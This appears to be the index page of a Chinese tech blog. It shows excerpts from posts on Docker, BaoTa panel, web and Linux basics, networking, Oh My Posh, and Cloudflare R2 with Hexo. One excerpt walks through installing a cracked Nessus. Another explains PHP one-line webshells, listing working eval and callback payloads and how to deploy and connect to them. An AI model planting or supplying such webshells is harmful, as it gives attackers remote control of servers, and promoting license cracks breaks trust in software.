浮生碌碌半世空

Nessus安装破解Nessus安装下载 提取码：t9Kt docker安装项目地址 使用docker部署，执行以下命令 1docker run -itd --name=ramisec_nessus -p 8834:8834 ramisec/nessus 更新，UPDATE_URL_YOU_GOT 需要生成 1docker exec -it ramisec_nessus /nessus/update.sh "UPDATE_URL_YOU_GOT" 您需要在 nessus 网站申请获取激活码的UPDATE_URL_YOU_GOT，并在本网站中生成 注册 去邮箱获取激活码 输入注册码，生成UPDATE_URL_YOU_GOT，第一个输入框输入类似的码：aaaaaa11b2222cc33d44e5f6666a777b8cc99912 得到UPDATE_URL_YOU_GOT 访问地址：https://127.0.0.1:8834/ 地址是https不是http 修改账号密码 12345678# 进入docker容器的命令行docker exec -it ramisec_nessus bash# 进入这个目录cd /opt/nessus/sbin# 列出登录用户nessuscli lsuser# 修改指定用户的密码（以admin为例）nessuscli chpasswd admin

PHP 一句话木马（Webshell）解析一句话木马是指隐藏在正常PHP代码中的小型恶意脚本，它通常体积很小（”一句话”大小），但能提供强大的远程控制功能。 基本形式最常见的PHP一句话木马格式： 1<?php @eval($_POST['pass']); ?> 或者： 1<?php $_GET['a']($_POST['b']); ?> 核心特征 精简结构：通常只有一行代码 动态执行：使用eval()、assert()或回调函数动态执行输入 隐蔽性：使用@抑制错误，避免被发现 工作原理 黑客将恶意代码插入网站文件中 通过HTTP请求传递要执行的代码 服务端接收并执行任意PHP命令 常见变种1. 基础eval型1<?php eval($_GET['c']); ?> 2. 文件写入型1<?php ?>'); ?> 3. 回调函数型1<?php $func=create_function('',$_POST['cmd']);$func(); ?> 4. 动态函数调用型1<?php $_GET['a']($_POST['b']); ?> 5. 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问，以POST方式传入shell=phpinfo(); 连接1. 中国蚁剑安装文档 2. 中国蚁剑配置连接 3....

Docker 环境 + 宝塔面板 以下是 Windows 系统安装 Docker 环境 + 宝塔面板的详细指南，包含容器化部署的注意事项和常见问题解决方案： 一、在 Windows 上安装 Docker 和 Docker Compose1. 安装 Docker Desktop 步骤： 下载 **Docker Desktop for Windows**。 双击安装包，勾选以下选项： Use WSL 2 instead of Hyper-V（推荐，性能更好） 添加 Docker Compose 到系统环境变量。 安装完成后重启电脑。 验证安装： 12docker --version # 输出 Docker 版本docker-compose --version # 输出 Docker Compose 版本 2. 配置 WSL 2 后端（必须） 启用 WSL：12dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestartdism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart 下载并安装 **WSL 2 内核更新包**。 设置默认 WSL 版本为 2：1wsl --set-default-version 2 二、通过 Docker 部署宝塔面板1. 创建专用目录和配置文件 在 Windows 中新建文件夹（如 C:\bt-panel）。 创建 docker-compose.yml 文件，内容如下：12345678910111213141516171819202122version:...

web基础概念知识Web基础概念知识详解1. 互联网与万维网（WWW） 互联网（Internet）: 全球互联的计算机网络，基于TCP/IP协议族进行通信，包含硬件设备（路由、服务器）和协议（HTTP, FTP, SMTP）。 万维网（World Wide Web, WWW）: 基于互联网的信息共享系统，通过HTTP协议和超文本（HTML）链接资源，核心组件包括： URL（资源定位符） HTTP/HTTPS（传输协议） Web浏览器（客户端工具） 2. 网页核心三剑客 技术 角色 示例代码 HTML 定义页面结构 <h1>标题</h1> CSS 控制样式与布局 body { background: #fff; } JavaScript 实现动态交互 document.getElementById(“btn”).onclick = () => {…} 3. HTTP/HTTPS协议 HTTP（超文本传输协议）: 无状态协议（每次请求独立） 请求方法：GET（获取资源）, POST（提交数据）, PUT, DELETE等。 状态码：200（成功）、404（未找到）、500（服务器错误）。 HTTPS: 加密版HTTP，使用SSL/TLS协议保护传输安全。 加密流程： 客户端发起HTTPS请求。 服务器返回数字证书（含公钥）。 客户端验证证书并生成对称加密密钥。 双方使用对称密钥加密通信。 4....

Linux操作系统介绍什么是 Linux？Linux 是一种开源的类 Unix 操作系统内核，由 Linus Torvalds 于 1991 年首次发布。 广义上的 Linux 通常指基于该内核的完整操作系统（如 Ubuntu、Fedora 等）， 结合了 GNU 项目 的软件工具，因此严格称为 GNU/Linux。 Linux 的核心特性 开源免费 源码公开可修改，社区协作开发，遵循 GPL 协议。 用户可自由分发、定制系统（无需支付版权费用）。 多用户与多任务 支持多个用户同时登录，可高效并行执行多个任务。 高稳定性与安全性 服务器可连续运行数年无需重启，漏洞修复快，权限管理严格。 硬件兼容性广泛 支持从嵌入式设备到超级计算机的多种硬件架构。 强大的命令行工具 通过终端（Terminal）可深度控制系统，支持脚本自动化。 Linux 发行版（Distros） 基于 Linux 内核的不同打包版本，满足不同场景需求： 类型 主流发行版 特点 通用桌面 Ubuntu、Fedora、Linux Mint 界面友好，适合日常办公及开发者使用 企业服务器 CentOS（Rocky Linux）、RHEL 长期支持（LTS），安全稳定，适用于服务器运维 轻量级 Alpine、Lubuntu 资源占用低，适合老旧硬件或容器环境 专精领域 Kali（安全渗透）、Raspbian（树莓派） 预装领域专用工具，开箱即用 Linux 的架构与核心组件 内核（Kernel） 管理硬件资源（CPU、内存、磁盘等），提供核心接口。 支持模块化驱动，可动态加载或卸载。 Shell 用户与内核交互的接口（如 Bash、Zsh），支持脚本编程。 文件系统 采用层级目录结构（/ 为根目录），如...

计算机网络概述Mermaid 可视化 + 结构化 的计算机网络核心知识框架 graph LR %% 计算机网络核心结构 Network[计算机网络] --> Architecture["分层架构"] Network --> Protocols["核心协议"] Network --> Devices["网络设备"] Network --> Security["网络安全"] %% ========== 分层架构 ========== Architecture --> OSI7["OSI七层模型"] OSI7 --> PhysicalLayer["物理层<br>（比特流传输）"] OSI7 --> DataLinkLayer["数据链路层<br>（MAC/帧）"] OSI7 --> NetworkLayer["网络层<br>（IP/路由）"] OSI7 --> TransportLayer["传输层<br>（TCP/UDP）"] OSI7 --> SessionLayer["会话层"] OSI7 --> PresentationLayer["表示层"] ...

操作系统的介绍什么是操作系统操作系统（Operating System, OS）是计算机系统中最核心的软件，扮演着硬件管理者和用户服务提供者的双重角色。它为用户和应用程序提供统一的接口，同时管理计算机的硬件资源，如处理器、内存、存储设备和外设。以下是关键内容的清晰梳理： classDiagram class 计算机系统 { +硬件系统 +软件系统 } 计算机系统 <|-- 硬件系统 计算机系统 <|-- 软件系统 class 硬件系统 { +中央处理器 +存储系统 +输入输出系统 } class 软件系统 { +系统软件 +应用软件 } 硬件系统 <|-- 中央处理器 : contains class 中央处理器 { 运算器 控制器 ... } 硬件系统 <|-- 存储系统 : contains class 存储系统 { 内存储器 软盘 硬盘 光盘 ... } 硬件系统 <|-- 输入输出系统 : contains class 输入输出系统 { 键盘 鼠标 打印机 ... } 软件系统 <|-- 系统软件 : contains ...

前言工具简介Oh My Posh 是一款用于美化 Windows 终端和 PowerShell 的工具，支持： 自定义提示符和主题 增强历史记录功能 个性化视觉效果 oh-my-posh官方文档 安装配置流程一、Oh My Posh 安装核心组件安装123winget install JanDeDobbeleer.OhMyPosh -s winget或Set-ExecutionPolicy Bypass -Scope Process -Force; Invoke-Expression ((New-Object System.Net.WebClient).DownloadString('https://ohmyposh.dev/install.ps1')) 配置文件设置(1) 检查配置文件1Test-path $profile (2) 创建配置文件（不存在就创建文件）1notepad $profile (3) 在文件里输入内容，后关闭PowerShell12Import-Module PSReadLineSet-PSReadLineOption -PredictionSource History 保存文件后会在目录：C:\Users\用户\Documents\WindowsPowerShell，下生成Microsoft.PowerShell_profile.ps1文件 常见报错处理Set-PSReadLineOption : 找不到与参数名称“PredictionSource”匹配的参数 确保你的 PSReadLine 模块是最新版本。你可以通过以下命令更新 PSReadLine 模块1Install-Module -Name PSReadLine -Force 上面安装完成后还是报错，检查 PowerShell 版本如果版本低于...

前言什么是图床将图片上传到服务商或个人远程服务器，通过网络地址直接访问的技术方案。适用于以下场景： 快速将图片插入文章内容 统一管理图片资源 便于图片迁移与分享 技术方案选择Cloudflare R2 免费额度：10GB/月存储容量（按30天日均存储峰平均值） 超额单价：$0.015/GB/月 API免费限制： 每天100万次B类事务（文件下载、元数据查询等） 每天1000万次A类事务（创建/列举存储桶等） PicGo客户端 开源图片上传工具 支持S3协议适配 剪贴板自动复制链接 准备事项账号准备 注册Cloudflare账号 需绑定付费计划（选择0元免费层级防止误扣费） 完成账号二次验证 域名准备 注册域名： 建议使用低成本年费域名（如.xyz域名） 可使用二级域名拆分（例：img.yourdomain.com） 托管方案： 若域名不在CF托管，需设置NS/CNAME记录转发 搭建流程Cloudflare R2 配置打开Cloudflare，选择R2对象存储 2. 创建储存桶 桶设置PS：如果域名不托管在CloudFlare，可以单独托管二级\三级域名，只需要给二级域名添加一条NS记录指向原托管即可。 * 选择设置 * 选择位置：根据自己位置选择 * 添加自定义域，继续 * 最好再选择：连接域 * R2.dev 子域：允许访问 * 之后就能浏览器 https://<自定义域名>/<文件名>访问存储桶里的文件了。 API令牌生成1. 管理API令牌 2. 创建API令牌 3. 创建API令牌完成 1. 输入令牌名称 2. 选择权限 3. 指定存储桶 4....

前言个人博客需满足以下要求： 免费：无需购买云服务器 易维护：专注内容发布，功能简洁 访问流畅：国内外用户均可稳定访问 最终方案：Cloudflare + GitHub + Hexo + Fluid 参考资源 陶渊小明博客 YouTube教程 Hexo 环境配置Hexo 是一个基于 Node.js 的静态博客框架，支持 Markdown 编写并生成 HTML 页面。 1. 安装 Node.js前往 Node.js 官网 下载并安装。 2. 配置 Hexo更换 npm 镜像源（国内加速）1npm config set registry https://registry.npmmirror.com 安装 Hexo 客户端1npm install -g hexo-cli 初始化博客项目12hexo init blog && cd blognpm install 到这里我们的 hexo 环境配置就基本完成了，下面就可以使用它来写文章和发布文章了！👍👍👍 使用 Hexo 管理博客为了方便编辑，我们使用 vscode 打开 blog 文件夹。下面来看一下 blog 里面的主要组成部分： 1234blog/├── _config.yml # 全局配置（站点名称、作者等）├── source/_posts # 存放 Markdown 文章，而且 hexo 自带了一篇 demo 文章 hello-world└── themes # 主题文件夹，hexo 有一个默认主题，但不太好看，后面可以改成漂亮一些的主题 接着我们执行命令，在本地把 hexo 服务跑起来。这样我们就可以，在本地网址的4000端口，预览文章效果。 12# windows执行hexo clean ; hexo g ;...